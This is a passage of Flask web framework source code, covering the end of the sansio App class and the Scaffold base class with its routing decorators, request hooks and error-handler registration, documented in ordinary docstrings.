#: a place where extensions can store application specific state. 
For #: example this is where an extension could store database engines and #: similar things. #: #: The key must match the name of the extension module. For example in #: case of a "Flask-Foo" extension in `flask_foo`, the key would be #: ``'foo'``. #: #: .. versionadded:: 0.7 self.extensions: dict[str, t.Any] = {} #: The :class:`~werkzeug.routing.Map` for this instance. You can use #: this to change the routing converters after the class was created #: but before any routes are connected. Example:: #: #: from werkzeug.routing import BaseConverter #: #: class ListConverter(BaseConverter): #: def to_python(self, value): #: return value.split(',') #: def to_url(self, values): #: return ','.join(super(ListConverter, self).to_url(value) #: for value in values) #: #: app = Flask(__name__) #: app.url_map.converters['list'] = ListConverter self.url_map = self.url_map_class(host_matching=host_matching) self.subdomain_matching = subdomain_matching # tracks internally if the application already handled at least one # request. self._got_first_request = False def _check_setup_finished(self, f_name: str) -> None: if self._got_first_request: raise AssertionError( f"The setup method '{f_name}' can no longer be called" " on the application. It has already handled its first" " request, any changes will not be applied" " consistently.\n" "Make sure all imports, decorators, functions, etc." " needed to set up the application are done before" " running it." ) @cached_property def name(self) -> str: # type: ignore """The name of the application. This is usually the import name with the difference that it's guessed from the run file if the import name is main. This name is used as a display name when Flask needs the name of the application. It can be set and overridden to change the value. .. versionadded:: 0.8 """ if self.import_name == "__main__": fn: str | None = getattr(sys.modules["__main__"], "__file__", None) if fn is None: return "__main__" return os.path.splitext(os.path.basename(fn))[0] return self.import_name @cached_property def logger(self) -> logging.Logger: """A standard Python :class:`~logging.Logger` for the app, with the same name as :attr:`name`. In debug mode, the logger's :attr:`~logging.Logger.level` will be set to :data:`~logging.DEBUG`. If there are no handlers configured, a default handler will be added. See :doc:`/logging` for more information. .. versionchanged:: 1.1.0 The logger takes the same name as :attr:`name` rather than hard-coding ``"flask.app"``. .. versionchanged:: 1.0.0 Behavior was simplified. The logger is always named ``"flask.app"``. The level is only set during configuration, it doesn't check ``app.debug`` each time. Only one format is used, not different ones depending on ``app.debug``. No handlers are removed, and a handler is only added if no handlers are already configured. .. versionadded:: 0.3 """ return create_logger(self) @cached_property def jinja_env(self) -> Environment: """The Jinja environment used to load templates. The environment is created the first time this property is accessed. Changing :attr:`jinja_options` after that will have no effect. """ return self.create_jinja_environment() def create_jinja_environment(self) -> Environment: raise NotImplementedError() def make_config(self, instance_relative: bool = False) -> Config: """Used to create the config attribute by the Flask constructor. 
The `instance_relative` parameter is passed in from the constructor of Flask (there named `instance_relative_config`) and indicates if the config should be relative to the instance path or the root path of the application. .. versionadded:: 0.8 """ root_path = self.root_path if instance_relative: root_path = self.instance_path defaults = dict(self.default_config) defaults["DEBUG"] = get_debug_flag() return self.config_class(root_path, defaults) def make_aborter(self) -> Aborter: """Create the object to assign to :attr:`aborter`. That object is called by :func:`flask.abort` to raise HTTP errors, and can be called directly as well. By default, this creates an instance of :attr:`aborter_class`, which defaults to :class:`werkzeug.exceptions.Aborter`. .. versionadded:: 2.2 """ return self.aborter_class() def auto_find_instance_path(self) -> str: """Tries to locate the instance path if it was not provided to the constructor of the application class. It will basically calculate the path to a folder named ``instance`` next to your main file or the package. .. versionadded:: 0.8 """ prefix, package_path = find_package(self.import_name) if prefix is None: return os.path.join(package_path, "instance") return os.path.join(prefix, "var", f"{self.name}-instance") def create_global_jinja_loader(self) -> DispatchingJinjaLoader: """Creates the loader for the Jinja2 environment. Can be used to override just the loader and keeping the rest unchanged. It's discouraged to override this function. Instead one should override the :meth:`jinja_loader` function instead. The global loader dispatches between the loaders of the application and the individual blueprints. .. versionadded:: 0.7 """ return DispatchingJinjaLoader(self) def select_jinja_autoescape(self, filename: str) -> bool: """Returns ``True`` if autoescaping should be active for the given template name. If no template name is given, returns `True`. .. versionchanged:: 2.2 Autoescaping is now enabled by default for ``.svg`` files. .. versionadded:: 0.5 """ if filename is None: return True return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg")) @property def debug(self) -> bool: """Whether debug mode is enabled. When using ``flask run`` to start the development server, an interactive debugger will be shown for unhandled exceptions, and the server will be reloaded when code changes. This maps to the :data:`DEBUG` config key. It may not behave as expected if set late. **Do not enable debug mode when deploying in production.** Default: ``False`` """ return self.config["DEBUG"] # type: ignore[no-any-return] @debug.setter def debug(self, value: bool) -> None: self.config["DEBUG"] = value if self.config["TEMPLATES_AUTO_RELOAD"] is None: self.jinja_env.auto_reload = value @setupmethod def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: """Register a :class:`~flask.Blueprint` on the application. Keyword arguments passed to this method will override the defaults set on the blueprint. Calls the blueprint's :meth:`~flask.Blueprint.register` method after recording the blueprint in the application's :attr:`blueprints`. :param blueprint: The blueprint to register. :param url_prefix: Blueprint routes will be prefixed with this. :param subdomain: Blueprint routes will match on this subdomain. :param url_defaults: Blueprint routes will use these default values for view arguments. :param options: Additional keyword arguments are passed to :class:`~flask.blueprints.BlueprintSetupState`. 
They can be accessed in :meth:`~flask.Blueprint.record` callbacks. .. versionchanged:: 2.0.1 The ``name`` option can be used to change the (pre-dotted) name the blueprint is registered with. This allows the same blueprint to be registered multiple times with unique names for ``url_for``. .. versionadded:: 0.7 """ blueprint.register(self, options) def iter_blueprints(self) -> t.ValuesView[Blueprint]: """Iterates over all blueprints by the order they were registered. .. versionadded:: 0.11 """ return self.blueprints.values() @setupmethod def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, provide_automatic_options: bool | None = None, **options: t.Any, ) -> None: if endpoint is None: endpoint = _endpoint_from_view_func(view_func) # type: ignore options["endpoint"] = endpoint methods = options.pop("methods", None) # if the methods are not given and the view_func object knows its # methods we can use that instead. If neither exists, we go with # a tuple of only ``GET`` as default. if methods is None: methods = getattr(view_func, "methods", None) or ("GET",) if isinstance(methods, str): raise TypeError( "Allowed methods must be a list of strings, for" ' example: @app.route(..., methods=["POST"])' ) methods = {item.upper() for item in methods} # Methods that should always be added required_methods = set(getattr(view_func, "required_methods", ())) # starting with Flask 0.8 the view_func object can disable and # force-enable the automatic options handling. if provide_automatic_options is None: provide_automatic_options = getattr( view_func, "provide_automatic_options", None ) if provide_automatic_options is None: if "OPTIONS" not in methods and self.config["PROVIDE_AUTOMATIC_OPTIONS"]: provide_automatic_options = True required_methods.add("OPTIONS") else: provide_automatic_options = False # Add the required methods now. methods |= required_methods rule_obj = self.url_rule_class(rule, methods=methods, **options) rule_obj.provide_automatic_options = provide_automatic_options # type: ignore[attr-defined] self.url_map.add(rule_obj) if view_func is not None: old_func = self.view_functions.get(endpoint) if old_func is not None and old_func != view_func: raise AssertionError( "View function mapping is overwriting an existing" f" endpoint function: {endpoint}" ) self.view_functions[endpoint] = view_func @setupmethod def template_filter( self, name: str | None = None ) -> t.Callable[[T_template_filter], T_template_filter]: """A decorator that is used to register custom template filter. You can specify a name for the filter, otherwise the function name will be used. Example:: @app.template_filter() def reverse(s): return s[::-1] :param name: the optional name of the filter, otherwise the function name will be used. """ def decorator(f: T_template_filter) -> T_template_filter: self.add_template_filter(f, name=name) return f return decorator @setupmethod def add_template_filter( self, f: ft.TemplateFilterCallable, name: str | None = None ) -> None: """Register a custom template filter. Works exactly like the :meth:`template_filter` decorator. :param name: the optional name of the filter, otherwise the function name will be used. """ self.jinja_env.filters[name or f.__name__] = f @setupmethod def template_test( self, name: str | None = None ) -> t.Callable[[T_template_test], T_template_test]: """A decorator that is used to register custom template test. You can specify a name for the test, otherwise the function name will be used. 
Example:: @app.template_test() def is_prime(n): if n == 2: return True for i in range(2, int(math.ceil(math.sqrt(n))) + 1): if n % i == 0: return False return True .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ def decorator(f: T_template_test) -> T_template_test: self.add_template_test(f, name=name) return f return decorator @setupmethod def add_template_test( self, f: ft.TemplateTestCallable, name: str | None = None ) -> None: """Register a custom template test. Works exactly like the :meth:`template_test` decorator. .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ self.jinja_env.tests[name or f.__name__] = f @setupmethod def template_global( self, name: str | None = None ) -> t.Callable[[T_template_global], T_template_global]: """A decorator that is used to register a custom template global function. You can specify a name for the global function, otherwise the function name will be used. Example:: @app.template_global() def double(n): return 2 * n .. versionadded:: 0.10 :param name: the optional name of the global function, otherwise the function name will be used. """ def decorator(f: T_template_global) -> T_template_global: self.add_template_global(f, name=name) return f return decorator @setupmethod def add_template_global( self, f: ft.TemplateGlobalCallable, name: str | None = None ) -> None: """Register a custom template global function. Works exactly like the :meth:`template_global` decorator. .. versionadded:: 0.10 :param name: the optional name of the global function, otherwise the function name will be used. """ self.jinja_env.globals[name or f.__name__] = f @setupmethod def teardown_appcontext(self, f: T_teardown) -> T_teardown: """Registers a function to be called when the application context is popped. The application context is typically popped after the request context for each request, at the end of CLI commands, or after a manually pushed context ends. .. code-block:: python with app.app_context(): ... When the ``with`` block exits (or ``ctx.pop()`` is called), the teardown functions are called just before the app context is made inactive. Since a request context typically also manages an application context it would also be called when you pop a request context. When a teardown function was called because of an unhandled exception it will be passed an error object. If an :meth:`errorhandler` is registered, it will handle the exception and the teardown will not receive it. Teardown functions must avoid raising exceptions. If they execute code that might fail they must surround that code with a ``try``/``except`` block and log any errors. The return values of teardown functions are ignored. .. versionadded:: 0.9 """ self.teardown_appcontext_funcs.append(f) return f @setupmethod def shell_context_processor( self, f: T_shell_context_processor ) -> T_shell_context_processor: """Registers a shell context processor function. .. versionadded:: 0.11 """ self.shell_context_processors.append(f) return f def _find_error_handler( self, e: Exception, blueprints: list[str] ) -> ft.ErrorHandlerCallable | None: """Return a registered error handler for an exception in this order: blueprint handler for a specific code, app handler for a specific code, blueprint handler for an exception class, app handler for an exception class, or ``None`` if a suitable handler is not found. 
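        For instance (illustrative), given::

            @bp.errorhandler(404)
            def bp_not_found(e):
                return "blueprint 404", 404

            @app.errorhandler(404)
            def app_not_found(e):
                return "app 404", 404

        a 404 aborted inside one of ``bp``'s views resolves to
        ``bp_not_found``, while the same error raised outside the blueprint
        falls back to ``app_not_found``.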
""" exc_class, code = self._get_exc_class_and_code(type(e)) names = (*blueprints, None) for c in (code, None) if code is not None else (None,): for name in names: handler_map = self.error_handler_spec[name][c] if not handler_map: continue for cls in exc_class.__mro__: handler = handler_map.get(cls) if handler is not None: return handler return None def trap_http_exception(self, e: Exception) -> bool: """Checks if an HTTP exception should be trapped or not. By default this will return ``False`` for all exceptions except for a bad request key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``. This is called for all HTTP exceptions raised by a view function. If it returns ``True`` for any exception the error handler for this exception is not called and it shows up as regular exception in the traceback. This is helpful for debugging implicitly raised HTTP exceptions. .. versionchanged:: 1.0 Bad request errors are not trapped by default in debug mode. .. versionadded:: 0.8 """ if self.config["TRAP_HTTP_EXCEPTIONS"]: return True trap_bad_request = self.config["TRAP_BAD_REQUEST_ERRORS"] # if unset, trap key errors in debug mode if ( trap_bad_request is None and self.debug and isinstance(e, BadRequestKeyError) ): return True if trap_bad_request: return isinstance(e, BadRequest) return False def should_ignore_error(self, error: BaseException | None) -> bool: """This is called to figure out if an error should be ignored or not as far as the teardown system is concerned. If this function returns ``True`` then the teardown handlers will not be passed the error. .. versionadded:: 0.10 """ return False def redirect(self, location: str, code: int = 302) -> BaseResponse: """Create a redirect response object. This is called by :func:`flask.redirect`, and can be called directly as well. :param location: The URL to redirect to. :param code: The status code for the redirect. .. versionadded:: 2.2 Moved from ``flask.redirect``, which calls this method. """ return _wz_redirect( location, code=code, Response=self.response_class, # type: ignore[arg-type] ) def inject_url_defaults(self, endpoint: str, values: dict[str, t.Any]) -> None: """Injects the URL defaults for the given endpoint directly into the values dictionary passed. This is used internally and automatically called on URL building. .. versionadded:: 0.7 """ names: t.Iterable[str | None] = (None,) # url_for may be called outside a request context, parse the # passed endpoint instead of using request.blueprints. if "." in endpoint: names = chain( names, reversed(_split_blueprint_path(endpoint.rpartition(".")[0])) ) for name in names: if name in self.url_default_functions: for func in self.url_default_functions[name]: func(endpoint, values) def handle_url_build_error( self, error: BuildError, endpoint: str, values: dict[str, t.Any] ) -> str: """Called by :meth:`.url_for` if a :exc:`~werkzeug.routing.BuildError` was raised. If this returns a value, it will be returned by ``url_for``, otherwise the error will be re-raised. Each function in :attr:`url_build_error_handlers` is called with ``error``, ``endpoint`` and ``values``. If a function returns ``None`` or raises a ``BuildError``, it is skipped. Otherwise, its return value is returned by ``url_for``. :param error: The active ``BuildError`` being handled. :param endpoint: The endpoint being built. :param values: The keyword arguments passed to ``url_for``. 
""" for handler in self.url_build_error_handlers: try: rv = handler(error, endpoint, values) except BuildError as e: # make error available outside except block error = e else: if rv is not None: return rv # Re-raise if called with an active exception, otherwise raise # the passed in exception. if error is sys.exc_info()[1]: raise raise error File: src/flask/sansio/scaffold.py from __future__ import annotations import importlib.util import os import pathlib import sys import typing as t from collections import defaultdict from functools import update_wrapper from jinja2 import BaseLoader from jinja2 import FileSystemLoader from werkzeug.exceptions import default_exceptions from werkzeug.exceptions import HTTPException from werkzeug.utils import cached_property from .. import typing as ft from ..helpers import get_root_path from ..templating import _default_template_ctx_processor if t.TYPE_CHECKING: # pragma: no cover from click import Group # a singleton sentinel value for parameter defaults _sentinel = object() F = t.TypeVar("F", bound=t.Callable[..., t.Any]) T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any]) T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_context_processor = t.TypeVar( "T_template_context_processor", bound=ft.TemplateContextProcessorCallable ) T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) T_url_value_preprocessor = t.TypeVar( "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable ) T_route = t.TypeVar("T_route", bound=ft.RouteCallable) def setupmethod(f: F) -> F: f_name = f.__name__ def wrapper_func(self: Scaffold, *args: t.Any, **kwargs: t.Any) -> t.Any: self._check_setup_finished(f_name) return f(self, *args, **kwargs) return t.cast(F, update_wrapper(wrapper_func, f)) class Scaffold: """Common behavior shared between :class:`~flask.Flask` and :class:`~flask.blueprints.Blueprint`. :param import_name: The import name of the module where this object is defined. Usually :attr:`__name__` should be used. :param static_folder: Path to a folder of static files to serve. If this is set, a static route will be added. :param static_url_path: URL prefix for the static route. :param template_folder: Path to a folder containing template files. for rendering. If this is set, a Jinja loader will be added. :param root_path: The path that static, template, and resource files are relative to. Typically not set, it is discovered based on the ``import_name``. .. versionadded:: 2.0 """ cli: Group name: str _static_folder: str | None = None _static_url_path: str | None = None def __init__( self, import_name: str, static_folder: str | os.PathLike[str] | None = None, static_url_path: str | None = None, template_folder: str | os.PathLike[str] | None = None, root_path: str | None = None, ): #: The name of the package or module that this object belongs #: to. Do not change this once it is set by the constructor. self.import_name = import_name self.static_folder = static_folder # type: ignore self.static_url_path = static_url_path #: The path to the templates folder, relative to #: :attr:`root_path`, to add to the template loader. ``None`` if #: templates should not be added. self.template_folder = template_folder if root_path is None: root_path = get_root_path(self.import_name) #: Absolute path to the package on the filesystem. 
Used to look #: up resources contained in the package. self.root_path = root_path #: A dictionary mapping endpoint names to view functions. #: #: To register a view function, use the :meth:`route` decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.view_functions: dict[str, ft.RouteCallable] = {} #: A data structure of registered error handlers, in the format #: ``{scope: {code: {class: handler}}}``. The ``scope`` key is #: the name of a blueprint the handlers are active for, or #: ``None`` for all requests. The ``code`` key is the HTTP #: status code for ``HTTPException``, or ``None`` for #: other exceptions. The innermost dictionary maps exception #: classes to handler functions. #: #: To register an error handler, use the :meth:`errorhandler` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.error_handler_spec: dict[ ft.AppOrBlueprintKey, dict[int | None, dict[type[Exception], ft.ErrorHandlerCallable]], ] = defaultdict(lambda: defaultdict(dict)) #: A data structure of functions to call at the beginning of #: each request, in the format ``{scope: [functions]}``. The #: ``scope`` key is the name of a blueprint the functions are #: active for, or ``None`` for all requests. #: #: To register a function, use the :meth:`before_request` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.before_request_funcs: dict[ ft.AppOrBlueprintKey, list[ft.BeforeRequestCallable] ] = defaultdict(list) #: A data structure of functions to call at the end of each #: request, in the format ``{scope: [functions]}``. The #: ``scope`` key is the name of a blueprint the functions are #: active for, or ``None`` for all requests. #: #: To register a function, use the :meth:`after_request` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.after_request_funcs: dict[ ft.AppOrBlueprintKey, list[ft.AfterRequestCallable[t.Any]] ] = defaultdict(list) #: A data structure of functions to call at the end of each #: request even if an exception is raised, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the :meth:`teardown_request` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.teardown_request_funcs: dict[ ft.AppOrBlueprintKey, list[ft.TeardownCallable] ] = defaultdict(list) #: A data structure of functions to call to pass extra context #: values when rendering templates, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the :meth:`context_processor` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.template_context_processors: dict[ ft.AppOrBlueprintKey, list[ft.TemplateContextProcessorCallable] ] = defaultdict(list, {None: [_default_template_ctx_processor]}) #: A data structure of functions to call to modify the keyword #: arguments passed to the view function, in the format #: ``{scope: [functions]}``. 
The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the #: :meth:`url_value_preprocessor` decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.url_value_preprocessors: dict[ ft.AppOrBlueprintKey, list[ft.URLValuePreprocessorCallable], ] = defaultdict(list) #: A data structure of functions to call to modify the keyword #: arguments when generating URLs, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the :meth:`url_defaults` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.url_default_functions: dict[ ft.AppOrBlueprintKey, list[ft.URLDefaultCallable] ] = defaultdict(list) def __repr__(self) -> str: return f"<{type(self).__name__} {self.name!r}>" def _check_setup_finished(self, f_name: str) -> None: raise NotImplementedError @property def static_folder(self) -> str | None: """The absolute path to the configured static folder. ``None`` if no static folder is set. """ if self._static_folder is not None: return os.path.join(self.root_path, self._static_folder) else: return None @static_folder.setter def static_folder(self, value: str | os.PathLike[str] | None) -> None: if value is not None: value = os.fspath(value).rstrip(r"\/") self._static_folder = value @property def has_static_folder(self) -> bool: """``True`` if :attr:`static_folder` is set. .. versionadded:: 0.5 """ return self.static_folder is not None @property def static_url_path(self) -> str | None: """The URL prefix that the static route will be accessible from. If it was not configured during init, it is derived from :attr:`static_folder`. """ if self._static_url_path is not None: return self._static_url_path if self.static_folder is not None: basename = os.path.basename(self.static_folder) return f"/{basename}".rstrip("/") return None @static_url_path.setter def static_url_path(self, value: str | None) -> None: if value is not None: value = value.rstrip("/") self._static_url_path = value @cached_property def jinja_loader(self) -> BaseLoader | None: """The Jinja loader for this object's templates. By default this is a class :class:`jinja2.loaders.FileSystemLoader` to :attr:`template_folder` if it is set. .. versionadded:: 0.5 """ if self.template_folder is not None: return FileSystemLoader(os.path.join(self.root_path, self.template_folder)) else: return None def _method_route( self, method: str, rule: str, options: dict[str, t.Any], ) -> t.Callable[[T_route], T_route]: if "methods" in options: raise TypeError("Use the 'route' decorator to use the 'methods' argument.") return self.route(rule, methods=[method], **options) @setupmethod def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["GET"]``. .. versionadded:: 2.0 """ return self._method_route("GET", rule, options) @setupmethod def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["POST"]``. .. versionadded:: 2.0 """ return self._method_route("POST", rule, options) @setupmethod def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["PUT"]``. .. 
versionadded:: 2.0 """ return self._method_route("PUT", rule, options) @setupmethod def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["DELETE"]``. .. versionadded:: 2.0 """ return self._method_route("DELETE", rule, options) @setupmethod def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["PATCH"]``. .. versionadded:: 2.0 """ return self._method_route("PATCH", rule, options) @setupmethod def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Decorate a view function to register it with the given URL rule and options. Calls :meth:`add_url_rule`, which has more details about the implementation. .. code-block:: python @app.route("/") def index(): return "Hello, World!" See :ref:`url-route-registrations`. The endpoint name for the route defaults to the name of the view function if the ``endpoint`` parameter isn't passed. The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` and ``OPTIONS`` are added automatically. :param rule: The URL rule string. :param options: Extra options passed to the :class:`~werkzeug.routing.Rule` object. """ def decorator(f: T_route) -> T_route: endpoint = options.pop("endpoint", None) self.add_url_rule(rule, endpoint, f, **options) return f return decorator @setupmethod def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, provide_automatic_options: bool | None = None, **options: t.Any, ) -> None: """Register a rule for routing incoming requests and building URLs. The :meth:`route` decorator is a shortcut to call this with the ``view_func`` argument. These are equivalent: .. code-block:: python @app.route("/") def index(): ... .. code-block:: python def index(): ... app.add_url_rule("/", view_func=index) See :ref:`url-route-registrations`. The endpoint name for the route defaults to the name of the view function if the ``endpoint`` parameter isn't passed. An error will be raised if a function has already been registered for the endpoint. The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` is always added automatically, and ``OPTIONS`` is added automatically by default. ``view_func`` does not necessarily need to be passed, but if the rule should participate in routing an endpoint name must be associated with a view function at some point with the :meth:`endpoint` decorator. .. code-block:: python app.add_url_rule("/", endpoint="index") @app.endpoint("index") def index(): ... If ``view_func`` has a ``required_methods`` attribute, those methods are added to the passed and automatic methods. If it has a ``provide_automatic_methods`` attribute, it is used as the default if the parameter is not passed. :param rule: The URL rule string. :param endpoint: The endpoint name to associate with the rule and view function. Used when routing and building URLs. Defaults to ``view_func.__name__``. :param view_func: The view function to associate with the endpoint name. :param provide_automatic_options: Add the ``OPTIONS`` method and respond to ``OPTIONS`` requests automatically. :param options: Extra options passed to the :class:`~werkzeug.routing.Rule` object. """ raise NotImplementedError @setupmethod def endpoint(self, endpoint: str) -> t.Callable[[F], F]: """Decorate a view function to register it for the given endpoint. Used if a rule is added without a ``view_func`` with :meth:`add_url_rule`. .. 
code-block:: python app.add_url_rule("/ex", endpoint="example") @app.endpoint("example") def example(): ... :param endpoint: The endpoint name to associate with the view function. """ def decorator(f: F) -> F: self.view_functions[endpoint] = f return f return decorator @setupmethod def before_request(self, f: T_before_request) -> T_before_request: """Register a function to run before each request. For example, this can be used to open a database connection, or to load the logged in user from the session. .. code-block:: python @app.before_request def load_user(): if "user_id" in session: g.user = db.session.get(session["user_id"]) The function will be called without any arguments. If it returns a non-``None`` value, the value is handled as if it was the return value from the view, and further request handling is stopped. This is available on both app and blueprint objects. When used on an app, this executes before every request. When used on a blueprint, this executes before every request that the blueprint handles. To register with a blueprint and execute before every request, use :meth:`.Blueprint.before_app_request`. """ self.before_request_funcs.setdefault(None, []).append(f) return f @setupmethod def after_request(self, f: T_after_request) -> T_after_request: """Register a function to run after each request to this object. The function is called with the response object, and must return a response object. This allows the functions to modify or replace the response before it is sent. If a function raises an exception, any remaining ``after_request`` functions will not be called. Therefore, this should not be used for actions that must execute, such as to close resources. Use :meth:`teardown_request` for that. This is available on both app and blueprint objects. When used on an app, this executes after every request. When used on a blueprint, this executes after every request that the blueprint handles. To register with a blueprint and execute after every request, use :meth:`.Blueprint.after_app_request`. """ self.after_request_funcs.setdefault(None, []).append(f) return f @setupmethod def teardown_request(self, f: T_teardown) -> T_teardown: """Register a function to be called when the request context is popped. Typically this happens at the end of each request, but contexts may be pushed manually as well during testing. .. code-block:: python with app.test_request_context(): ... When the ``with`` block exits (or ``ctx.pop()`` is called), the teardown functions are called just before the request context is made inactive. When a teardown function was called because of an unhandled exception it will be passed an error object. If an :meth:`errorhandler` is registered, it will handle the exception and the teardown will not receive it. Teardown functions must avoid raising exceptions. If they execute code that might fail they must surround that code with a ``try``/``except`` block and log any errors. The return values of teardown functions are ignored. This is available on both app and blueprint objects. When used on an app, this executes after every request. When used on a blueprint, this executes after every request that the blueprint handles. To register with a blueprint and execute after every request, use :meth:`.Blueprint.teardown_app_request`. """ self.teardown_request_funcs.setdefault(None, []).append(f) return f @setupmethod def context_processor( self, f: T_template_context_processor, ) -> T_template_context_processor: """Registers a template context processor function. 
These functions run before rendering a template. The keys of the returned dict are added as variables available in the template. This is available on both app and blueprint objects. When used on an app, this is called for every rendered template. When used on a blueprint, this is called for templates rendered from the blueprint's views. To register with a blueprint and affect every template, use :meth:`.Blueprint.app_context_processor`. """ self.template_context_processors[None].append(f) return f @setupmethod def url_value_preprocessor( self, f: T_url_value_preprocessor, ) -> T_url_value_preprocessor: """Register a URL value preprocessor function for all view functions in the application. These functions will be called before the :meth:`before_request` functions. The function can modify the values captured from the matched url before they are passed to the view. For example, this can be used to pop a common language code value and place it in ``g`` rather than pass it to every view. The function is passed the endpoint name and values dict. The return value is ignored. This is available on both app and blueprint objects. When used on an app, this is called for every request. When used on a blueprint, this is called for requests that the blueprint handles. To register with a blueprint and affect every request, use :meth:`.Blueprint.app_url_value_preprocessor`. """ self.url_value_preprocessors[None].append(f) return f @setupmethod def url_defaults(self, f: T_url_defaults) -> T_url_defaults: """Callback function for URL defaults for all view functions of the application. It's called with the endpoint and values and should update the values passed in place. This is available on both app and blueprint objects. When used on an app, this is called for every request. When used on a blueprint, this is called for requests that the blueprint handles. To register with a blueprint and affect every request, use :meth:`.Blueprint.app_url_defaults`. """ self.url_default_functions[None].append(f) return f @setupmethod def errorhandler( self, code_or_exception: type[Exception] | int ) -> t.Callable[[T_error_handler], T_error_handler]: """Register a function to handle errors by code or exception class. A decorator that is used to register a function given an error code. Example:: @app.errorhandler(404) def page_not_found(error): return 'This page does not exist', 404 You can also register handlers for arbitrary exceptions:: @app.errorhandler(DatabaseError) def special_exception_handler(error): return 'Database connection failed', 500 This is available on both app and blueprint objects. When used on an app, this can handle errors from every request. When used on a blueprint, this can handle errors from requests that the blueprint handles. To register with a blueprint and affect every request, use :meth:`.Blueprint.app_errorhandler`. .. versionadded:: 0.7 Use :meth:`register_error_handler` instead of modifying :attr:`error_handler_spec` directly, for application wide error handlers. .. versionadded:: 0.7 One can now additionally also register custom exception types that do not necessarily have to be a subclass of the :class:`~werkzeug.exceptions.HTTPException` class. 
:param code_or_exception: the code as integer for the handler, or an arbitrary exception """ def decorator(f: T_error_handler) -> T_error_handler: self.register_error_handler(code_or_exception, f) return f return decorator @setupmethod def register_error_handler( self, code_or_exception: type[Exception] | int, f: ft.ErrorHandlerCallable, ) -> None: """Alternative error attach function to the :meth:`errorhandler` decorator that is more straightforward to use for non decorator usage. .. versionadded:: 0.7 """ exc_class, code = self._get_exc_class_and_code(code_or_exception) self.error_handler_spec[None][code][exc_class] = f @staticmethod def _get_exc_class_and_code( exc_class_or_code: type[Exception] | int, ) -> tuple[type[Exception], int | None]: """Get the exception class being handled. For HTTP status codes or ``HTTPException`` subclasses, return both the exception and status code. :param exc_class_or_code: Any exception class, or an HTTP status code as an integer. """ exc_class: type[Exception] if isinstance(exc_class_or_code, int): try: exc_class = default_exceptions[exc_class_or_code] except KeyError: raise ValueError( f"'{exc_class_or_code}' is not a recognized HTTP" " error code. Use a subclass of HTTPException with" " that code instead." ) from None else: exc_class = exc_class_or_code if isinstance(exc_class, Exception): raise TypeError( f"{exc_class!r} is an instance, not a class. Handlers" " can only be registered for Exception classes or HTTP" " error codes." ) if not issubclass(exc_class, Exception): raise ValueError( f"'{exc_class.__name__}' is not a subclass of Exception." " Handlers can only be registered for Exception classes" " or HTTP error codes." ) if issubclass(exc_class, HTTPException): return exc_class, exc_class.code else: return exc_class, None def _endpoint_from_view_func(view_func: ft.RouteCallable) -> str: """Internal helper that returns the default endpoint for a given function. This always is the function name. """ assert view_func is not None, "expected view func if endpoint is not provided." return view_func.__name__ def _path_is_relative_to(path: pathlib.PurePath, base: str) -> bool: # Path.is_relative_to doesn't exist until Python 3.9 try: path.relative_to(base) return True except ValueError: return False def _find_package_path(import_name: str) -> str: """Find the path that contains the package or module.""" root_mod_name, _, _ = import_name.partition(".") try: root_spec = importlib.util.find_spec(root_mod_name) if root_spec is None: raise ValueError("not found") except (ImportError, ValueError): # ImportError: the machinery told us it does not exist # ValueError: # - the module name was invalid # - the module name is __main__ # - we raised `ValueError` due to `root_spec` being `None` return os.getcwd() if root_spec.submodule_search_locations: if root_spec.origin is None or root_spec.origin == "namespace": # namespace package package_spec = importlib.util.find_spec(import_name) if package_spec is not None and package_spec.submodule_search_locations: # Pick the path in the namespace that contains the submodule. package_path = pathlib.Path( os.path.commonpath(package_spec.submodule_search_locations) ) search_location = next( location for location in root_spec.submodule_search_locations if _path_is_relative_to(package_path, location) ) else: # Pick the first path. 
